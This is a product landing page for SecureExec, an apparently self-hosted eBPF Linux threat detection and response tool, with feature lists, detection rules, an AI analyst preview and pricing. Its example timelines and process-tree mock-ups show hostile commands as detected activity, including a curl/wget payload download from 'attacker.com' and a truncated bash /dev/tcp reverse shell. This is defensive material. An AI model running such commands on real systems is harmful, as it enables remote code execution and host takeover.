SecureExec
HomeAboutBlogPricing
Sign InSign Up
For teams who run Linux in production

Detect and Stop Linux Host Compromise in Minutes

eBPF-powered agent catches threats from initial access to lateral movement — without heavy agents and without sending telemetry to someone else's cloud. 20+ built-in detection rules, one-click response, 100% self-hosted.

Get Started Free
See How It Works ↓Technical overview →

15 min demo · We show detection, investigation, and response on a live Linux host.

20+
detection rules
<1%
CPU overhead
60s
agent install

secureexec-agent
$ dpkg -i secureexec-agent.deb
$ systemctl start secureexec-agent
[INFO] eBPF programs loaded
[INFO] Attached: process_exec, file_open, connect, dns_query
[INFO] gRPC stream connected
[OK] Streaming events → server

Built for Real Attack Scenarios

From SSH brute-force to full host compromise — detect, investigate, and respond.

Catch Reverse Shells

Detect bash/sh spawning outbound connections — the #1 post-exploitation technique. Alert fires in under 100ms.

Stop SSH Brute-Force

Stateful detection of repeated auth failures. See source IP, username, and timing — isolate the host in one click.

Monitor Critical Files

Track writes to /etc/passwd, /etc/shadow, cron dirs, and SSH authorized_keys. Know who changed what and when.

Investigate the Full Attack Chain

From any alert, expand the full process tree: see how the attacker got in and what they touched next.

Contain Incidents in Seconds

One-click network isolation + process tree kill. Stop the attack without SSH-ing into the box.

Response actions

Detect and Respond — Not Just Detection

Most open-source tools stop at collecting events. SecureExec closes the loop.

When a threat is detected, your team can isolate the host, kill the process tree, or block the executable — all from the web console. No SSH, no manual intervention.

Network Isolation
Cut off a host from the network without losing the agent connection.
Kill Process Tree
Terminate the entire attack chain from the ancestor process with one click.
Block by Hash or Path
Prevent known-bad executables from running via fanotify — applied instantly across all endpoints.
Global Blocklist
Manage blocking rules centrally — rules are pushed to all endpoints automatically.

From Alert to Full Attack Story

SSH brute-force, initial access, payload download, persistence, C2 — see the entire incident as a chronological narrative, not raw events. Expandable timeline entries show process context, file changes, and network connections. Phase labels (Initial Access, Persistence, C2) are assigned automatically.

incident-timeline
12:04:01process"sshd" → bash spawned (PID 5678)
12:04:03networkOutbound: 198.51.100.7:443 (TCP)C2
12:04:05fileFile created: /tmp/.payload.shExecution
12:04:06fileFile modified: /etc/cron.d/updatePersistence
12:04:07alertAlert: [high] Cron Persistence
Coming soon

AI Security Analyst — Your Embedded SOC Teammate

An LLM-powered agent that investigates alerts the way a senior analyst would — gathering evidence, building context, and delivering a verdict. Self-hosted option keeps your data on your infrastructure.

No dedicated SOC? No problem. The AI analyst triages every alert automatically: checks the process tree, correlates events across the host, searches IOCs fleet-wide, queries threat intelligence — and produces an evidence-backed investigation report with a confidence score and recommended response actions.

ai-investigation
#1get_process_treegunicorn → python3 → bash (reverse shell)
#2search_events14:15 file_create /tmp/.x.py | 14:23 connect → 45.33.22.11:4444
#3search_ioc_fleetIP 45.33.22.11 → 0 other hosts affected
#4lookup_threat_intelAbuseIPDB: 12 reports (C2/botnet) | VT: 4/87 malicious
TRUE POSITIVEconfidence: 98%
Active reverse shell via compromised web app. C2 to 45.33.22.11. Recommend: kill process tree, block hash, isolate host.
1
Alert Triage
Receives the alert, examines the process tree and parent chain, checks if the activity is a known benign pattern.
2
Deep Investigation
Searches correlated events, checks the IOC across the fleet, queries threat intel feeds, examines alert history for the host.
3
Verdict & Summary
Delivers a true/false positive verdict with confidence score, a human-readable attack narrative, and a list of discovered IOCs.
4
Response Recommendations
Proposes specific actions — isolate host, kill process tree, block hash — with evidence trail. Auto-approve policies for high-confidence verdicts.
Self-Hosted AI
Run with a local LLM (Ollama) — your data never leaves your infrastructure. Cloud providers (Anthropic, OpenAI) also supported.
Evidence-Backed Verdicts
Every conclusion cites specific events, processes, and IOCs. Full audit trail of every tool call the AI made.
No Black Box
See exactly what the AI investigated: every API call, every piece of evidence, every reasoning step — transparent and auditable.

How It Works

From kernel hook to actionable alert in under 100ms.

1

eBPF Hooks

Kernel-level tracepoints and kprobes capture syscalls — process exec, file ops, connect(), DNS queries.

2

Rust Agent

Events are enriched with process context, container ID, and username, then streamed via gRPC.

3

Detection Engine

20+ built-in rules evaluate every event. Custom rules supported via Starlark scripting.

4

Search & Investigate

Events are indexed and searchable. Process tree, full-text search, and alert investigation in the web console.

Built-in Detection Rules

Production-ready rules that fire on real threats. Tuned to minimize false positives with process context and allowlists.

SSH Brute-Force

Stateful detection of repeated SSH failures from the same source IP within a time window, with cooldown logic.

Reverse Shell

Catches shell processes (bash, sh, zsh) making outbound network connections — the #1 post-exploitation technique.

Privilege Escalation to Root

Detects UID changes to root from non-root processes, excluding known system services.

Container Namespace Escape

Flags suspicious unshare/setns calls with user, PID, or mount namespace flags from unexpected processes.

Fileless Execution

Detects memfd_create usage — the primary vector for fileless malware on Linux.

Cron Persistence

Alerts on new cron job creation in /etc/cron.* and /var/spool/cron/ by non-system processes.

Crypto Miner

Detects miner process names, stratum protocol patterns in command lines, mining pool ports, and known pool DNS queries.

Ransomware

Alerts on ransom note creation, file renames to encrypted extensions, mass file renaming, and backup wipe commands.

SSH Authorized Keys Tampering

Alerts on writes to any .ssh/authorized_keys file by processes other than ssh-copy-id.

Process Injection

Detects cross-process memory writes via process_vm_writev — used by injection tools to write shellcode into other processes.

View all 21 detection rules →

From Alert to Attack Graph in One Click

When an alert fires, click "Process Tree" to see the full execution chain — ancestors, children, and correlated security events — in an interactive visual graph. IOC enrichment automatically discovers other processes that touched the same IPs, DNS names, or files, turning lineage into a true attack graph. Cut investigation time from 30 minutes to under 2.

Learn about Process Tree
sshd
PID 1234 · root
bash
PID 5678 · user
curl attacker.com/payload.sh
PID 5679 · user
reverse_shell
bash -i >& /dev/tcp/...
PID 5680 · user
wget attacker.com/...
PID 9012 · www-data
IOC: ip:198.51.100.7

Built for Linux Security Teams

Everything you need to detect, investigate, and respond to threats on Linux servers.

eBPF-Powered Collection

Kernel-level visibility via eBPF — capture process exec, file operations, network connections, and DNS queries with zero blind spots and near-zero overhead.

20+ Built-in Detection Rules

Ready-to-use rules for SSH brute-force, reverse shells, privilege escalation, container escape, fileless malware, and persistence techniques.

Process Tree & IOC Graph

One-click interactive graph from any alert — see the full parent-child chain, correlated events, and IOC-enriched attack graph with auto-discovered related processes.

100% Self-Hosted

Full Docker Compose deployment on your infrastructure. Your event data never leaves your servers. Air-gapped deployments supported.

Full-Text Event Search

Every event is indexed — instant full-text search across millions of events with configurable retention policies.

Lightweight Rust Agent

Single binary, zero dependencies. Under 1% CPU and minimal memory usage on production servers — deploys in 60 seconds.

Deploys Safely on Production Linux

eBPF-first, no kernel module requiredUbuntu 20.04+, Debian 11+, RHEL 8+, Amazon Linux 2Single binary, zero dependencies< 1% CPU, < 50 MB RAMUninstall in one commandOptional kmod fallback for older kernels

Why Not Just Use What You Know?

Every team asks: why not Wazuh, CrowdStrike, or auditd? Here's the honest answer.

SecureExec
WazuhCrowdStrike / S1auditd + osquery
eBPF kernel visibility
Built-in detection rules
Process tree visualization
Host isolation (1 click)
Block by hash / path
Self-hosted & air-gapped
Agent < 1% CPU
Transparent pricing

Built for teams who need real response capabilities, not just log forwarding.

What You'll See in a 15-Minute Demo

Not a slide deck. A live walkthrough on a real Linux host.

Agent install
Agent installs on a Linux host in 60 seconds.
Live detection
Real-time alert fires on a live attack scenario.
Attack timeline
Incident timeline shows the full attack story.
Process tree
Process tree traces the full execution chain.
Host isolation
One-click host isolation and process tree kill.
Alert workflow
Triage, assign, close, and open a case.

15 min demo · We show detection, investigation, and response on a live Linux host.

Simple, Transparent Pricing

Start free, scale as you grow. No hidden fees.

Community

Up to 5 hosts — get started instantly

Free
  • Up to 5 Linux hosts
  • All event types (process, file, network, DNS)
  • 20+ built-in detection rules
  • 7-day event retention
  • Process tree visualization
  • Web console & alert search
  • Community support
MOST POPULAR

Pro

Unlimited hosts, full response capabilities

$8/host/mo
  • Unlimited Linux hosts
  • All event types + DNS
  • 20+ built-in + custom detection rules
  • 90-day event retention
  • Network isolation (1-click)
  • Kill process tree
  • Block by hash / path
  • Slack / Telegram / Email notifications
  • Email support

Enterprise

Air-gapped, SSO, dedicated SLA

Custom
  • Everything in Pro
  • Air-gapped / on-prem deployment
  • SSO / SAML integration
  • Custom retention policies
  • Dedicated deployment assistance
  • Priority support & SLA
  • Audit log export

Request a technical demo with a live attack scenario

Start Detecting Threats on Your Linux Servers

Deploy in minutes with Docker Compose, or request a guided demo for your team.

Get Started Free
SecureExec

Lightweight endpoint security platform. Real-time visibility into process, file, and network activity across your entire fleet.

Product
  • Pricing
Company
  • About
  • Blog
  • Contact Sales
  • Support
Account
  • Sign In
  • Sign Up
Legal
  • Privacy Policy
  • Terms of Service

© 2026 SecureExec. All rights reserved.

Built with Rust & Next.js